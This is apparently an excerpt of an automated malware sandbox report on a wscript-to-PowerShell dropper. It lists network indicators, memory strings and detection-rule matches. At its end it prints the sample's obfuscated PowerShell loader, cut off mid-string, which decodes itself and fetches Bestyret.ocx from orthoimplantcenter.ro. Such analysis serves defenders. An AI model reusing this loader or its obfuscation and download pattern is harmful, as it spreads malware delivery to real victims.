Source: Submited Sample |
Integrated Neural Analysis Model: Matched 99.2% probability |
Source: unknown |
HTTPS traffic detected: 188.241.183.45:443 -> 192.168.2.11:49706 version: TLS 1.2 |
Source: |
Binary string: m.Core.pdbk source: powershell.exe, 00000007.00000002.2864093210.0000000008588000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic |
HTTP traffic detected: GET /Bestyret.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: orthoimplantcenter.roConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /Bestyret.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: orthoimplantcenter.roConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: gormezl_6777.6777.6777.677e |
Source: global traffic |
DNS traffic detected: DNS query: orthoimplantcenter.ro |
Source: powershell.exe, 00000007.00000002.2864093210.0000000008570000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab: |
Source: wscript.exe, 00000001.00000003.1555385159.000001B46EE0A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?91b5065270408 |
Source: wscript.exe, 00000001.00000003.1554978924.000001B470C57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555631445.000001B470C57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1554448292.000001B470C57000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabl |
Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmexol |
Source: wscript.exe, 00000001.00000002.1564405714.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562697497.000001B46EDAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563518584.000001B46EDBC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj |
Source: wscript.exe, 00000001.00000003.1555506674.000001B46EE32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555385159.000001B46EE0A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?91b5065270 |
Source: powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE8B6D1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://orthoimplantcenter.ro |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000004.00000002.1710822472.000001DEA2092000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://wicroft.com |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB_q |
Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE8AD57000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1684347363.000001DE8B300000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://orthoimplantcenter.ro |
Source: powershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://orthoimplantcenter.ro/Bestyret.ocxP |
Source: powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://orthoimplantcenter.ro/Bestyret.ocxXR1lX |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
HTTPS traffic detected: 188.241.183.45:443 -> 192.168.2.11:49706 version: TLS 1.2 |
Source: amsi32_8028.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 8028, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspo |